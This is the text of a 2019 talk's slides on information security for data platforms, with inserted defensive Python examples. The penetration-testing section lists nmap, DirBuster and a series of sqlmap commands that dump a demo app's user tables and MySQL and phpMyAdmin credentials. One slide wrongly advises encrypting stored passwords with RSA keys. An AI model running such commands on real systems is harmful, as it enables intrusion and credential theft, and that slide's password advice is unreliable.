Demystify Information Security & Threats for
Data-Driven Platforms
Chetan Khatri
Solution Architect - Data & ML.
Accionlabs Inc.
18th Oct, 2019
Who Am I?
Professional Career:
● 2016 - Present - Technical Lead / Solution Architect - Data & ML.
● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice.
● 2014 - 2016 - Developer - Data Platforms.
● 2012 - 2014 - Consultant - Product developments.
University: Master of Computer Science.
Data Warehousing, Data Mining, Information Security / Cryptography, Reverse
Engineering, Information Retrieval.
Agenda
● Motivation
● Information Security - Ethics.
● Encryption
● Authentication
● Information Security & Potential threats with Open Source World.
● Find vulnerabilities.
● Checklist before using any Open Source library.
● Vulnerabilities report.
● Penetration Testing for Data Driven Developments.
Information Security - Motivation
Why is Information Security important?
Information Security - Motivation
Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
Information Security - Motivation
Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
Information Security - Motivation
Source: https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
Information Security - Motivation
Source: https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
Information Security - Motivation
Source: https://www.zdnet.com/article/another-data-leak-hits-india-aadhaar-biometric-database/
Information Security - Ethics.
● Information Storage - What, Which form, Access to whom?
● Information Usage - Where, How, Which form?
● Responsibility - Ownership, usage?
● Confidentiality
● Authentication
● Governance - Regulators, Guidelines, Damage?
● Freedom vs Force
● Damage to the Society.
● Impact on humanity.
● Data Breach and Cost.
Freedom vs Force
Source:
https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force
Source: https://www.cnbc.com/2018/04/10/facebook-cambridge-analytica-a-timeline-of-the-data-hijacking-scandal.html
Source: https://www.engadget.com/2019/07/24/facebook-will-pay-5-billion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics
Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/
Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
Encryption
How many people have seen passwords in plain text in a database?
80%??
90%??
Yes, Sad but True.
Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
Encryption
Never ever store the application's passwords in plain text.
Encrypt it. Use Asymmetric Key Encryption.
If RSA, use ssh-keygen -t rsa -b 4096
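What a practitioner actually keeps in the users table is a salted, slow, one-way hash, so that a full database dump (the Equifax case above) does not hand out reusable credentials and there is no decryption key to lose. The Python below is an added example, not code from the talk or from any project it cites; it uses only the standard library, and the record layout, the iteration count and the audit helper are my own assumptions.

```python
import hashlib
import hmac
import os
from typing import Iterable, List, Optional, Tuple

# Work factor for PBKDF2-HMAC-SHA256 (an assumption; raise it as hardware gets faster).
ITERATIONS = 200_000
SALT_BYTES = 16
ALGORITHM = "pbkdf2_sha256"


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Derive a one-way, salted hash and pack it as algo$iterations$salt$digest.

    The salt is random per user, so two users with the same password get
    different records and one precomputed table cannot be reused across them.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return False  # not one of our records: never accept, never crash
    _, iterations, salt_hex, digest_hex = parts
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    # hmac.compare_digest avoids the timing side channel of an early-exit ==.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def audit_credentials(rows: Iterable[Tuple[str, str]]) -> List[str]:
    """Audit helper: return user ids whose stored credential is not a hash record.

    `rows` is an iterable of (user_id, stored_value) pairs, e.g. from a SELECT
    over the users table; anything that does not parse as a record produced by
    hash_password is reported as a plain-text (or legacy) secret to migrate.
    """
    flagged = []
    for user_id, stored in rows:
        parts = stored.split("$")
        if len(parts) != 4 or parts[0] != ALGORITHM:
            flagged.append(user_id)
    return flagged


if __name__ == "__main__":
    # Constructed sample data: one hashed record, one plain-text password.
    record = hash_password("correct horse battery staple")
    print(verify_password("correct horse battery staple", record))    # True
    print(verify_password("wrong", record))                           # False
    print(audit_credentials([("alice", record), ("bob", "hunter2")]))  # ['bob']
```

The record carries its own algorithm and iteration count, so the work factor can be raised later and old rows re-hashed at next login without a schema change.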
Authentication
Open IP
Open Ports
Default Username and Password for Database, Services etc.
Chmod 777 for all directories, files ! Lol ;p
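Of the four items above, the chmod 777 habit is the one a defender can audit mechanically on every deployment. The Python below is an added example, not code from the talk: it walks a directory tree, reports every path that grants write permission to "other", and clears that bit on request; the sample tree it builds in a temporary directory is constructed here for illustration.

```python
import os
import stat
import tempfile
from typing import List


def find_world_writable(root: str) -> List[str]:
    """Return paths under `root` (root included) whose mode grants write to 'other'.

    Paths come back relative to root and sorted, so results are stable.
    Symlinks are skipped: their own mode bits are meaningless and the target
    is audited wherever it actually lives.
    """
    hits: List[str] = []

    def check(path: str) -> None:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            return
        if st.st_mode & stat.S_IWOTH:
            hits.append(os.path.relpath(path, root))

    check(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            check(os.path.join(dirpath, name))
    return sorted(hits)


def remove_other_write(root: str, rel_path: str) -> int:
    """Clear the other-write bit on one path and return the resulting mode bits."""
    path = os.path.join(root, rel_path)
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~stat.S_IWOTH)
    return stat.S_IMODE(os.lstat(path).st_mode)


def make_demo_tree() -> str:
    """Constructed sample tree: a 777 directory, a 666 config file, two sane files."""
    root = tempfile.mkdtemp(prefix="permaudit-")  # mkdtemp creates it 0700
    os.mkdir(os.path.join(root, "uploads"))
    os.chmod(os.path.join(root, "uploads"), 0o777)
    for rel, mode in (("app.conf", 0o666), ("uploads/notes.txt", 0o600), ("README", 0o644)):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    findings = find_world_writable(demo)
    print(findings)                                  # ['app.conf', 'uploads']
    for rel in findings:
        print(rel, oct(remove_other_write(demo, rel)))  # app.conf 0o664, uploads 0o775
    print(find_world_writable(demo))                 # []
```

Run it against an application's install root as the deployment user; anything it lists is a file or directory that any local account can alter, which is exactly what 777 gives away.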
Information Security & Potential threats with Open Source World.
How many of you use Open Source?
Security for Open Source world
How well do you know what is inside your project?
Security for Open Source world
Known Good Development practices.
Community Supported Open Source Code.
v/s
Random Code found on the Internet.
Vulnerability in Open Source
Source: https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
Have a look
First look
Key questions for a first look?
● Read the README.md or any other readily accessible introductory
information?
● Does code seem to be held with good software development standards?
● Is this code developed for professional purposes or as a hobby project?
● Any signs of known issues in the code?
● Does this code only solve one use case or is it robust enough for other use
cases?
● Is this code active or an archive, “abandoned”?
Look for warning signs...
Warning Signs
Even an author says - to use something else!
Source: https://code.google.com/archive/p/crypto-js/
Built by an unauthorized person
Source: https://metacpan.org/release/Tivoli-AccessManager-Admin
I did not write this code, but I like it.
Source:
https://github.com/kbranigan/cJSON
Not maintained anymore … Archived!
Source:
https://code.google.com/archive/p/crypto-js/
Dumbest library - An author!
Source: https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
It is slower and more susceptible to side-channel attacks by nature.
Source:
http://www.literatecode.com/aes256
What to watch before using any
package/library?
Key Questions for each Open Source Library
Do only 1-2 collaborators exist? Chances are higher that unreviewed, harmful code got in.
Is code merged to the master branch reviewed through a PR?
How many issues are OPEN?
Validate that OPEN issues are being addressed.
Is the code maintained or abandoned?
Are issues getting fixed and released promptly?
Key Questions for each Open Source Library
Check recently active committers and commits, to understand how old the project is.
Check how they handle vulnerabilities and security.
How can you report security vulnerabilities?
Check open security bugs/issues.
Good example: Apache Community.
https://www.apache.org/security/
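The questions on the two slides above can be turned into a repeatable check that runs the same way for every dependency. The Python below is an added example, not from the talk or from Apache: the RepoFacts fields are what you would read off a repository page, the two sample projects are constructed, and the thresholds (2 contributors, 365 days since the last commit, 20% unreviewed merges, 50% stale issues) are my own assumptions to tune per team.

```python
from dataclasses import dataclass
from datetime import date
from typing import List


@dataclass
class RepoFacts:
    """Facts readable from a project's repository page (values here are constructed)."""
    name: str
    archived: bool
    contributors: int
    last_commit: date
    open_issues: int
    stale_open_issues: int     # open issues with no maintainer reply for more than 90 days
    unreviewed_merges: int     # commits on master that did not arrive through a reviewed PR
    total_merges: int
    has_security_policy: bool  # e.g. a SECURITY.md or a published disclosure address


# Thresholds are assumptions for this example, not a standard.
MAX_TRUSTED_SOLO_CONTRIBUTORS = 2
MAX_DAYS_SINCE_COMMIT = 365
MAX_UNREVIEWED_RATIO = 0.20
MAX_STALE_ISSUE_RATIO = 0.50


def review_library(repo: RepoFacts, today: date) -> List[str]:
    """Apply the checklist and return one warning string per failed question."""
    warnings: List[str] = []
    if repo.archived:
        warnings.append("archived: no further fixes will be released")
    if repo.contributors <= MAX_TRUSTED_SOLO_CONTRIBUTORS:
        warnings.append(f"only {repo.contributors} contributor(s): "
                        "code is unlikely to have had a second reviewer")
    age_days = (today - repo.last_commit).days
    if age_days > MAX_DAYS_SINCE_COMMIT:
        warnings.append(f"last commit {age_days} days ago: project looks abandoned")
    if repo.total_merges and repo.unreviewed_merges / repo.total_merges > MAX_UNREVIEWED_RATIO:
        warnings.append("more than 20% of merges to master bypassed PR review")
    if repo.open_issues and repo.stale_open_issues / repo.open_issues > MAX_STALE_ISSUE_RATIO:
        warnings.append(f"{repo.stale_open_issues} of {repo.open_issues} open issues "
                        "have gone unanswered for over 90 days")
    if not repo.has_security_policy:
        warnings.append("no documented way to report a security vulnerability")
    return warnings


# Two constructed projects: one that passes every question, one that fails them all.
HEALTHY = RepoFacts("example-healthy", archived=False, contributors=40,
                    last_commit=date(2019, 10, 1), open_issues=120, stale_open_issues=10,
                    unreviewed_merges=2, total_merges=500, has_security_policy=True)
SUSPECT = RepoFacts("example-suspect", archived=True, contributors=1,
                    last_commit=date(2016, 3, 1), open_issues=10, stale_open_issues=8,
                    unreviewed_merges=5, total_merges=10, has_security_policy=False)


if __name__ == "__main__":
    today = date(2019, 10, 18)  # the talk's date, fixed so the output is reproducible
    for repo in (HEALTHY, SUSPECT):
        print(repo.name, review_library(repo, today))
```

Feeding real numbers in (from the repository API or by hand) turns "have a look" into a record you can attach to the dependency review, and the thresholds make the team's tolerance explicit instead of leaving it to whoever happened to look.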
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY!
1101 new vulnerabilities reported in Oct 2019 alone.
Source: https://nvd.nist.gov/vuln/full-listing/2019/10
Vulnerabilities report
We are getting far worse!
Source: https://www.cvedetails.com/browse-by-date.php
Penetration Testing
{Network, Database}
Check number of OPEN services and ports:
sudo nmap -p- -sS -A IP-Address
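Scanning is only half of the check; the other half is comparing what is open with what is supposed to be open. The Python below is an added example, not from the talk: it parses nmap's grepable output (what the command above produces with -oG - added) and reports open ports that are not on a per-environment allowlist. The scan text is constructed and the addresses are made up; the regex assumes the grepable port-field layout port/state/protocol//service//version/.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of `nmap ... -oG -` output; addresses and banners are invented.
SAMPLE_SCAN = """\
# Nmap 7.80 scan initiated as: nmap -p- -sS -oG - 10.0.0.5 10.0.0.6
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 3306/open/tcp//mysql//MySQL 5.7/, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65532)
Host: 10.0.0.6 ()\tStatus: Up
Host: 10.0.0.6 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/\tIgnored State: closed (65534)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# port/state/protocol//service//   (owner and version fields are not needed here)
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")

Port = Tuple[int, str, str]  # (port number, protocol, service name)


def parse_grepable(text: str) -> Dict[str, List[Port]]:
    """Map each scanned host to the ports nmap reported as open."""
    hosts: Dict[str, List[Port]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comments and blank lines
        fields = line.split("\t")         # grepable fields are tab-separated
        host = fields[0].split()[1]       # "Host: 10.0.0.5 ()" -> "10.0.0.5"
        hosts.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for port, state, proto, service in PORT_RE.findall(field):
                if state == "open":       # filtered/closed entries are not exposure
                    hosts[host].append((int(port), proto, service))
    return hosts


def unexpected_open_ports(scan: Dict[str, List[Port]],
                          allowed: Set[int]) -> Dict[str, List[Port]]:
    """Return only the hosts and ports that are open but not on the allowlist."""
    findings: Dict[str, List[Port]] = {}
    for host, ports in scan.items():
        extra = [p for p in ports if p[0] not in allowed]
        if extra:
            findings[host] = extra
    return findings


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_SCAN)
    # A database port reachable from the scanning host is the classic finding
    # for a data platform: MySQL should only listen to the application tier.
    print(unexpected_open_ports(scan, allowed={22}))
    # {'10.0.0.5': [(3306, 'tcp', 'mysql')]}
```

Keeping the allowlist in version control beside the deployment config lets the same script run after every release and fail the pipeline when a new listener appears.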
Server Files / Directories Scan on permission and Access:
java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337
httrack website copier
Subgraph Vega
● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications.
● SQL Injection
● XSS
● Inadvertently disclosed sensitive information
● Reflected cross-site scripting
● Stored cross-site scripting
● Blind SQL injection
● Remote file include
● Shell injection
● TLS / SSL security settings
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL
injection flaws and a lot!
● Database fingerprinting.
● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
● Dump database tables entirely.
● Out-of-the-box search support for database names, table names, column names and values.
● Support to execute arbitrary commands and retrieve their standard output.
● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
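Both the Vega findings listed earlier and the SQLMap features above come down to one defect in the application: a request parameter (the demo's email field) spliced into SQL text. The Python below is an added example, not from the talk, from Vega or from SQLMap; it shows the vulnerable lookup beside its hardened form on an in-memory SQLite table constructed to mirror the demo's user_profile (Email, Mobile, Name) columns, and the e-mail regex is my own assumption for input validation.

```python
import re
import sqlite3
from typing import List, Tuple

Row = Tuple[str, str, str]


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the demo's user_profile table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_profile (Email TEXT, Mobile TEXT, Name TEXT)")
    conn.executemany(
        "INSERT INTO user_profile VALUES (?, ?, ?)",
        [("alice@example.com", "555-0100", "Alice"),
         ("bob@example.com", "555-0101", "Bob")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> List[Row]:
    """The bug the scanners report: the parameter becomes part of the SQL text.

    A value containing a quote closes the string literal early and the rest of
    the input is parsed as SQL, which is how a single field ends up dumping a
    whole table.
    """
    query = f"SELECT Email, Mobile, Name FROM user_profile WHERE Email = '{email}'"
    return conn.execute(query).fetchall()


# Assumed, deliberately strict shape for an address; adjust to your own rules.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def lookup_safe(conn: sqlite3.Connection, email: str) -> List[Row]:
    """Hardened form: validate the field, then bind it as a query parameter.

    The placeholder keeps the value out of the SQL grammar entirely, so even
    without the regex the input could only ever be compared, never executed;
    the regex is defence in depth and gives a clean rejection to log.
    """
    if not EMAIL_RE.match(email):
        return []
    query = "SELECT Email, Mobile, Name FROM user_profile WHERE Email = ?"
    return conn.execute(query, (email,)).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    crafted = "' OR '1'='1"        # the textbook probe a scanner sends first
    print(lookup_vulnerable(conn, "alice@example.com"))  # one row
    print(len(lookup_vulnerable(conn, crafted)))         # 2: every row leaks
    print(lookup_safe(conn, crafted))                    # []
```

Parameter binding is the fix; the validation only narrows what reaches the database and gives you something to alert on when a scan like the one in the demo starts.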
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email,Mobile,Name --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User,Password
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User,Password --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
Questions?
Hope you had fun!
Thank you!
Chetan Khatri, chetan.khatri@live.com
@khatri_chetan - https://twitter.com/khatri_chetan
https://github.com/chetkhatri

 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
 

Kürzlich hochgeladen

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 

Kürzlich hochgeladen (20)

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
